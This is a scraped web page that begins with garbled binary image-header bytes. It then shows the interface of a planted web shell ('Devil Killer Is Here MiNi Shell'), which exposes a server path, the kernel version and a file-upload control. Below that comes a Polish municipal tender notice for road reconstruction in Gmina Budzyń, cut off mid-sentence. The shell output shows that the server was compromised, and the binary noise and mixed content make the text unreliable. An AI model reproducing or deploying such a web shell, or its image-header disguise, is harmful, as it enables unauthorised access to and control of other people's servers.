JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211108/0026129001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg w Gminie Budzyń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BUDZYŃ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przemysłowa 16 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Budzyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 2843201; 2843313</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">67 2843 370</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@budzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.budzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg w Gminie Budzyń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ad9895f0-408c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00261290</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002788/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Przebudowa drogi gminnej Nr 201543P w m. Kąkolewice - Etap II</p> <p class="mb-0">1.1.10 Przebudowa drogi wewnętrznej we wsi Brzekiniec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.budzyn.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.budzyn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie Zamówień Publicznych Urzędu Miasta i Gminy Budzyń (Platformie ZETO<br/>PZP). Wykonawca posiadający konto na Platformie ZETO PZP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku”.2. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie<br/>korzystania z Platformy ZETO PZP” oraz „Instrukcji obsługi systemu PZP przeznaczoną dla<br/>Wykonawcy”.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji”<br/>wynosi 150 MB.4. Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie<br/>ZETO PZP tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje; zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji z wyjątkiem Internet Explorer; włączona obsługa JavaScript; zainstalowany program Acrobat<br/>Reader lub inny obsługujący pliki w formacie .pdf; podłączony lub wbudowany do komputera czytnik<br/>karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Użytkownika lub aplikacja<br/>komputerowa spełniająca funkcje takiego czytnika (tzw. podpis chmurowy).5. Za datę przekazania<br/>oferty, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę ZETO PZP.6.<br/>Zamawiający przekazuje link do postępowania jako załącznik do niniejszej SWZ. Dane postępowanie<br/>można wyszukać również na Liście wszystkich postępowań w Platformie ZETO PZP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKM.272.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi wewnętrznej we wsi Brzekiniec <br/><br/>Przedmiotem zamówienia jest wykonanie robót budowlanych branży drogowej, sanitarnej <br/>w zakresie naprawy odwodnienia jezdni i przyległego terenu oraz związanych z wykonaniem oświetlenia drogowego drogi wewnętrznej we wsi Brzekiniec od km. 0+000,0 do km. 0+295,0 na terenie działek nr 11/6 i 60/2. Łączna długość odcinka przebudowywanej drogi etapu wynosi 295 m.<br/>Ogólny zakres obejmuje wykonanie n/w robót:<br/>-	wymianę wzdłuż krawędzi jezdni betonowych krawężników ulicznych (zwykłych i najazdowych) na nowe,<br/>-	ułożenie ścieku przy-krawężnikowego o szer. 20 cm, z dwóch rzędów kostki betonowej prostokątnej grub. 8 cm, na podbudowie z betonu C16/20, po lewej i prawej stronie drogi,<br/>-	ułożenie na całej długości i szerokości jezdni nowej warstwy ścieralnej z mieszanki mineralno - asfaltowej AC 11S-50/70 (dla KR 1), o grub. 5 cm,<br/>-	wprowadzenie nowej stałej organizacji ruchu.<br/>-	odwodnienie pasa drogowego odbywać się będzie powierzchniowo do istniejących wpustów kanalizacji deszczowej lub istniejących odparowywujących rowów przydrożnych.<br/>-	wykonanie linii kablowych dla zasilania latarni oświetleniowych, wykonanych kablami YAKY 4x25mm2 o łącznej długości 350m;<br/>- wykonanie instalacji uziemiającej słupy latarni oświetleniowych o łącznej długości 350m<br/>-	montaż szafki oświetleniowej SO szt. 1;<br/>- ustawienie słupów oświetleniowych wraz z oprawami szt. 9;<br/><br/>Ogólny dane dotyczące branży drogowej: <br/>Stan Istniejący: jezdnia umocniona jest nawierzchnią z mieszanki mineralno - bitumicznej, która ułożona jest na podbudowie tłuczniowej. Niweleta poprzeczna i podłużna jezdni jest pofałdowana. W konstrukcji nawierzchni występują osłabienia w warstwie bitumicznej w postaci pęknięć siatkowych Na w/w drodze gminnej występuje lokalny ruch samochodów od skrzyżowania z drogą powiatową nr 1490P w km. 0+297,0 do bramy wjazdowej zakładu produkcyjnego w km. 0+000,0.<br/>Dane wyjściowe przebudowy drogi:<br/>•	klasa drogi – D,<br/>•	kategoria ruchu – KR-1, <br/>•	prędkość projektowa – Vp=40 km/h,<br/>•	droga jedno jezdniowe z dwoma pasami ruchu, <br/>•	przebieg trasy – bez wykopów i nasypów, <br/>•	głębokość przemarzania gruntu – 0,8 m, <br/>•	grupa nośności podłoża gruntowego – G2. <br/>Parametry techniczne: <br/>•	długość drogi – 295,0 m,<br/>•	szerokość jezdni – od 5,0 do 6,0 m (łącznie z ściekiem przykrawężnikowym), <br/>•	spadek poprzeczny jezdni, dwustronny - 2,0 %,<br/>•	spadek podłużny jezdni – bez zmian.<br/>Przebieg drogi w planie – nie projektuje się zmian w przebiegu drogi.<br/>Przebieg drogi w przekroju podłużnym – droga przebiega po istniejącym spadku podłużnym.<br/>Rozpoznanie geologiczne nie wskazało na występowanie w podłożu gruntów słabonośnych.<br/>Nawierzchnię jezdni planuje się wykonać wg. poniższej technologii:<br/>-	wykonanie frezowania profilującego na całej szer. jezdni od km. 0+000 do km. 0+185, <br/> o grub. od 0 do 5 cm,<br/>-	wykonanie naprawy cząstkowej nawierzchni masą mineralno-asfaltową AC 11W-50/70, <br/>o śred. grub. 4 cm,<br/>-	ułożenie warstwy ścieralnej na całej szer. jezdni od km. 0+000 do km. 0+295 – mieszanka<br/> mineralno-asfaltowa AC 11S 50/70 (dla KR 1), o grub. 5 cm, <br/><br/>Odwodnienie- Odwodnienie pasa drogowego na odc. od km. 0+000 do km. 0+177 odbywać się będzie powierzchniowo, poprzez nadanie 2 % spadku poprzecznego jezdni w kierunku do projektowanego ścieku przy-krawężnikowego i dalej do istniejących czterech wpustów kanalizacji deszczowej. Odwodnienie pasa drogowego na odc. od km. 0+120 do km. 0+295 odbywać się będzie powierzchniowo, poprzez nadanie 2 % spadku poprzecznego jezdni i poboczy w kierunku do istniejących rowów przydrożnych, które należy poddać konserwacji poprzez ich oczyszczanie z namułu wraz z profilowaniem ich dna i skarp. <br/>Rowy należy wykonać o kształcie trójkątnym z nachyleniem skarp od 1:1 do 1:1,5. Głębokość i spadek podłużny rowu dostosować do niwelety drogi. Min. głębokość rowu 0,50 m liczona jako różnica poziomów dna i zewnętrznej krawędzi przyległego pobocza. Ilość rowu do konserwacji wynosi 258,0 mb.<br/>Po wykonaniu nowej nawierzchni jezdni projektuje się wykonanie uzupełnienie poboczy gruntem ulepszonym, o średniej grub. warstwy 10 cm. Uzupełnienie to wykonać należy do wysokości krawędzi nowo ułożonej warstwy ścieralnej przyległej jezdni. Przed tym umocnieniem należy wykonać zdjęcie warstwy humusu pod poboczami wraz z ich profilowaniem<br/>Oznakowanie pionowe i poziome - planuje się wykonanie nowego oznakowania znakami pionowymi w ilości i asortymencie przedstawionym w projekcie zmiany stałej organizacji ruchu<br/>Ogólny dane dotyczące branży elektrycznej : <br/>Przyjęto następujące wymagania oświetleniowe: <br/>- jezdnia- klasa oświetleniowa M6 <br/>- chodniki – klasa oświetleniowa P5 <br/>- przejście dla pieszych – klasa PC5; <br/>•	Oprawy drogowe na montowane na wysokości 9 m montowane bezpośrednio na wierzchołkach<br/>słupów oraz z wykorzystaniem wysięgników o podniesieniu 1m i wysięgu 1m, temperaturze barwowej 4000 K. Kąt nachylenia oprawy +50 w stosunku do poziomu gruntu. <br/>•	Oprawy doświetlające przejścia dla pieszych montowane na wysokości 6 m na słupie <br/>o wys. 5m z wykorzystaniem wysięgników o podniesieniu 1m i wysięgu 1m; <br/>•	Oprawy doświetlające przejścia dla pieszych o temperaturze barwowej 5700 K; <br/>•	Zasilanie projektowanych latarni oświetlenia drogowego – obwody nr 1, 2 i 3 wyprowadzone <br/>z projektowanej szafy SO. <br/>•	Słupy stalowe, stożkowe, ocynkowane, wykonane z blachy o grubości 3mm, montowane na dedykowanych, prefabrykowanych fundamentach betonowych. <br/>•	Kąt nachylenia opraw (rotacje) w stosunku do podłoża zgodnie z obliczeniami dla<br/> poszczególnych sytuacji drogowych.<br/><br/>Wykonanie linii kablowych:<br/>Zasilanie oświetlenia drogowego zaprojektowano liniami kablowymi wykonanymi kablami <br/>YAKY 4x25mm2 ułożonymi w ziemi na głębokości 70 cm. W rowie kable ułożyć na 10 cm warstwie piasku, a następnie po nasypaniu 10cm warstwy piasku i 15 cm gruntu rodzimego oznaczyć folią koloru niebieskiego o grubości min 0,3mm i szerokości min. 20cm. Kable układać linią falistą z 2% zapasem. W celu uziemienia słupów na dnie rowu kablowego (pod podsypką), na całej długości linii kablowych ułożyć bednarkę FeZn 25x4. Skrzyżowanie kabli energetycznych z kablami telekomunikacyjnymi, nn-0,4kV, rurociągami, drogami oraz podjazdami wykonać w rurach osłonowych DVK 75 oraz SRS 75 lub równorzędnych.<br/><br/>Szczegółowy zakres prac określają przedmiary robót wraz z dokumentacją projektową </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 250000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi gminnej Nr 201543P w m. Kąkolewice - Etap II.<br/>Przedmiotem zamówienia jest wykonanie robót budowlanych branży drogowej związanych <br/>z realizacją drugiego etapu przebudowy drogi gminnej nr 201543P, w miejscowości Kąkolewice, na odcinku od km. 0+000 do km. 0+370,3 , części działek nr 143 i 256/1 oraz od km. 0+370,3 do km. 0+651,0 na części działki o nr 54, obręb ewidencyjny Kąkolewice, gmina Budzyń. Łączna długość przebudowywanego odcinka wynosi 651,0 m. <br/>Główny zakres obejmuje wykonanie n/w zakresu robót:<br/>od km. 0+000,0 do km. 0+370,3:<br/>•	ułożenie na całej długości i szerokości jezdni nowej warstwy wiążącej z mieszanki mineralno asfaltowa AC 16W-50/70, o grub. 5 cm,<br/>•	ułożenie na całej długości i szerokości jezdni nowej warstwy ścieralnej z mieszanki mineralno -asfaltowa AC11S-50/70, o grub. 4 cm,<br/>•	umocnienie poboczy klińcem 0/31,5 mm o grub. 10 cm i o szer. 1,0 m,<br/>•	Odwodnienie pasa drogowego odbywa się będzie powierzchniowo do istniejących zieleńców<br/>od km. 0+370,3 do km. 0+651,0:<br/>•	miejscowe wyrównanie profilu poprzecznego i podłużnego jezdni klińcem 0/31,5 mm<br/> o śred. grub. 5 cm,<br/>• ułożenie na całej długości i szerokości jezdni nowej warstwy wiążącej z mieszanki mineralno asfaltowa AC16W-50/70, o grub. 5 cm,<br/>•	ułożenie na całej długości i szerokości jezdni nowej warstwy ścieralnej z mieszanki mineralno - asfaltowa AC 11S-50/70, o grub. 4 cm,<br/>•	umocnienie poboczy klińcem 0/31,5 mm o grub. 10 cm i o szer. 1,0 m,<br/>•	wykonanie konserwacji istniejących rowów przydrożnych wraz z remontem i oczyszczeniem istniejących przepustów pod zjazdami.<br/>•	Odwodnienie pasa drogowego odbywa się będzie powierzchniowo do istniejących rowów <br/> przydrożnych.<br/>Dane wyjściowe przebudowy drogi:<br/>-	klasa drogi – D, <br/>-	prędkość projektowa – Vp=40 km/h,<br/>-	ulice jedno jezdniowa z dwoma pasami ruchu, <br/>-	przekrój podstawowy - jezdni 4,0 m,<br/>-	przebieg trasy – bez wykopów i nasypów, <br/>-	kategoria ruchu – KR-1, <br/>-	max pochylenie podłużne 10 %.<br/>-	głębokość przemarzania gruntu – 0,8 m, <br/>-	grupa nośności podłoża gruntowego –G2. <br/><br/>Oznakowanie pionowe i poziome<br/>Planuje się wykonać oznakowanie drogi znakami w ilościach i asortymencie przedstawionym w dokumentacji projektowej oraz przedmiarach rabót.<br/><br/>Regulacja urządzeń obcych w jezdni.<br/>W cenie jednostkowej ułożenia wszystkich nowych warstw konstrukcyjnych na jezdni, zjazdach <br/>i poboczu należy zawrzeć regulację wszystkich urządzeń obcych znajdujących się w tych nawierzchniach z uwzględnieniem obramowań i powiązaniem wysokościowym do elementów sąsiadujących. Dopuszcza się odchyłki na nawierzchni: zaniżenie do 0,5 cm i wyniesienie do 0,5 cm. <br/>Urządzenia zniszczone będą wymienione na nowe na koszt ich właściciela, odrębnym trybem, <br/>we współpracy z Zamawiającym. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 260000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu, dotyczące:<br/>3)	sytuacji ekonomicznej i finansowej (dotyczy części nr 1 i/lub części nr 2): tj. 